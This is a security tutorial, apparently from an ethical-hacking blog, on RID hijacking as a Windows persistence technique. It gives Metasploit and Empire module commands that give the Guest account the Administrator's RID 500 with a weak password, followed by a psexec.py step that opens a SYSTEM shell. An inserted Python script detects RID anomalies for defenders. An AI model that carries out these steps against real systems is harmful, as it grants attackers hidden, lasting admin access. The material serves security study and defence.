Windows Persistence: RID Hijacking

In this post, we discuss RID hijacking, which sits in the persistence stage of the cyber kill chain, and you will learn two ways to perform it (with Metasploit and with Empire).

Table of Contents

Introduction

  • FSMO roles
  • SID & RID
  • Syntax
  • Important Key points

RID-Hijacking

  • Metasploit
  • Empire

Introduction

Microsoft divides the responsibilities of a domain controller (DC) into FSMO (Flexible Single Master Operation) roles that together make up a full Active Directory system. There are five FSMO roles, some forest-wide and some domain-wide:

  • Schema Master (one per forest)
  • Domain Naming Master (one per forest)
  • Relative identifier (RID) Master (one per domain)
  • Primary Domain Controller (PDC) Emulator (one per domain)
  • Infrastructure Master (one per domain)

SID & RID

The RID (Relative Identifier) is the last part of a SID (security identifier) and must be unique for a particular object within its domain. Each security principal has a unique SID that is issued by a security agent; the agent can be a Windows local system or a domain. The agent generates the SID when the security principal is created. The SID can be represented as a character string or as a structure.

Syntax

Syntax: S-[Revision]-[IdentifierAuthority]-[SubAuthority0]-[SubAuthority1]-…-[SubAuthority[SubAuthorityCount]](-RID)

Example: S-1-5-21-1543651058-3042185658-368006193-1001 (here the RID is 1001)

Important Key Points

  • The revision is always 1 for current NT versions.
  • When Windows establishes a new issuing authority, such as when someone deploys a new computer or creates a domain, it generates a Security Identifier (SID) with an identifier authority value of 5.
  • This constant serves as the base for all Windows SIDs. Windows then assigns a fixed value of 21 as the root of this group of sub-authorities. After that, the system generates a 96-bit random number and divides it into three 32-bit chunks, each of which becomes a sub-authority.
  • If a domain is the new issuing authority, the resulting SID is called the domain SID.
  • In this context, Windows allocates Relative Identifiers (RIDs) from 1,000 onwards. RIDs with a value below 1,000 are reserved for special accounts.
  • For instance, any Windows account with a RID of 500 is treated by its issuing authority as the built-in Administrator account.

RID Hijacking

‘RID Hijacking’ is a technique an adversary uses to persist on a victim’s system by assigning the RID of the Administrator account to the Guest account, or to another local account. Persistence in the victim’s system lets the adversary keep a foothold and regain access again and again without being noticed, logging on as the hijacked account with the privileges of the account whose RID it took.

To do this, you first need a session with a privileged account, as shown in the screenshot below, in order to establish persistent access.

RID Hijacking: Metasploit

As shown above, we have a Meterpreter session with administrator privileges, and Metasploit provides a post module that creates persistence on a victim’s machine by hijacking the RID of an administrator user.

This module creates an entry on the target by modifying the properties of an existing account. Specifically, it changes the account attributes by setting a Relative Identifier (RID), which must belong to an existing account on the destination machine. By exploiting certain integrity issues in Windows Local Users Management, this module allows authentication using the credentials of one known account (such as the GUEST account) while accessing the system with the privileges of another account (like the ADMINISTRATOR account), even if the spoofed account is disabled.

use post/windows/manage/rid_hijack
set getsystem true
set guest_account true
set session 2
set password 123
exploit

Once you run the exploit, it first checks the status of the GUEST account. If the account is disabled, it will activate it. After that, it will overwrite the RID value from 501 to 500, which is the RID value of the ADMINISTRATOR account.

As you saw in the step above, the Guest account’s RID is now 500 and its password is 123, so we log in as Guest to get a CMD prompt with Administrator privileges on the target machine. Here we use Impacket’s psexec.py to obtain the CMD shell on the remote machine.

cd /impacket/examples
./psexec.py Guest:123@192.168.1.107

As you can observe, we have obtained a CMD shell as “nt authority\system”, i.e. a command prompt with administrator privileges.

RID Hijacking: Empire
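The following is an added example, not part of the original post and not code from the Metasploit or Empire modules. It ties the SID layout from the “Important Key Points” section to the outcome described above (the Guest account carrying RID 500): it parses SID strings, checks them against that layout, and flags any account whose RID is shared with another account or is a reserved built-in RID (500 or 501) under a different name. The account rows and user name “raj” are constructed for illustration; a defender would feed it the local-account listing gathered from the host.

```python
import re
from dataclasses import dataclass, field

# Constructed account listing (not real output), mirroring the state the post
# describes after the module runs: Guest holds the Administrator RID (500)
# instead of its own (501). The domain part reuses the post's example SID.
SAMPLE_ACCOUNTS = [
    ("Administrator", "S-1-5-21-1543651058-3042185658-368006193-500"),
    ("Guest",         "S-1-5-21-1543651058-3042185658-368006193-500"),
    ("raj",           "S-1-5-21-1543651058-3042185658-368006193-1001"),
]

# RIDs below 1000 are reserved; these two are the ones discussed in the post.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest"}

SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")


@dataclass
class Sid:
    revision: int
    identifier_authority: int
    sub_authorities: list = field(default_factory=list)

    @property
    def rid(self) -> int:
        # The RID is the final sub-authority.
        return self.sub_authorities[-1]

    @property
    def domain_sid(self) -> str:
        # Everything before the RID identifies the issuing authority.
        return "S-%d-%d-%s" % (
            self.revision, self.identifier_authority,
            "-".join(str(s) for s in self.sub_authorities[:-1]))


def parse_sid(text: str) -> Sid:
    """Parse the string form S-<revision>-<authority>-<sub>...-<RID>."""
    m = SID_RE.match(text.strip())
    if not m:
        raise ValueError("not a SID string: %r" % text)
    rev, auth, rest = m.groups()
    subs = [int(x) for x in rest.split("-")[1:]]
    return Sid(int(rev), int(auth), subs)


def is_nt_account_sid(sid: Sid) -> bool:
    """Shape from the key points: revision 1, authority 5, sub-authority 21,
    three 32-bit random chunks, then the RID (five sub-authorities in total)."""
    return (sid.revision == 1
            and sid.identifier_authority == 5
            and len(sid.sub_authorities) == 5
            and sid.sub_authorities[0] == 21
            and all(0 <= s < 2 ** 32 for s in sid.sub_authorities[1:]))


def find_rid_anomalies(accounts):
    """Return (name, sid, reason) tuples for accounts whose RID does not fit.

    Two checks: a RID held by two different account names, and a reserved RID
    (500/501) carried by an account whose name does not match. A legitimately
    renamed built-in Administrator also trips the second check, so treat hits
    as leads to confirm on the host, not as proof of hijacking.
    """
    findings = []
    owner_of_rid = {}
    for name, sid_text in accounts:
        sid = parse_sid(sid_text)
        if not is_nt_account_sid(sid):
            findings.append((name, sid_text, "unexpected SID structure"))
            continue
        rid = sid.rid
        if rid in owner_of_rid and owner_of_rid[rid] != name:
            findings.append((name, sid_text,
                             "RID %d is already held by %s" % (rid, owner_of_rid[rid])))
        owner_of_rid.setdefault(rid, name)
        expected = WELL_KNOWN_RIDS.get(rid)
        if expected is not None and name.lower() != expected.lower():
            findings.append((name, sid_text,
                             "RID %d belongs to the built-in %s account" % (rid, expected)))
    return findings


if __name__ == "__main__":
    for name, sid_text, reason in find_rid_anomalies(SAMPLE_ACCOUNTS):
        print("%-14s %s  <- %s" % (name, sid_text, reason))
```

Run against the constructed listing, the check reports the Guest row twice: once because RID 500 is already held by Administrator, and once because RID 500 is reserved for the built-in Administrator account.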

RID hijacking is also possible with Empire; you need to clone it from GitHub.

git clone https://github.com/BC-SECURITY/Empire/

Once you finish the configuration, launch the module to start the attack; it proceeds just as the Metasploit module does. It first identifies the status of the Guest account and then hijacks RID 500 for the Guest user.

usemodule persistence/elevated/rid_hijack*
set UseGuest True
set Password 123
set Enable True
execute

Repeat the psexec.py step above to connect to the victim’s CMD and confirm that you have a privileged shell.

Reference

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-azod/ecc7dfba-77e1-4e03-ab99-114b349c7164

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security.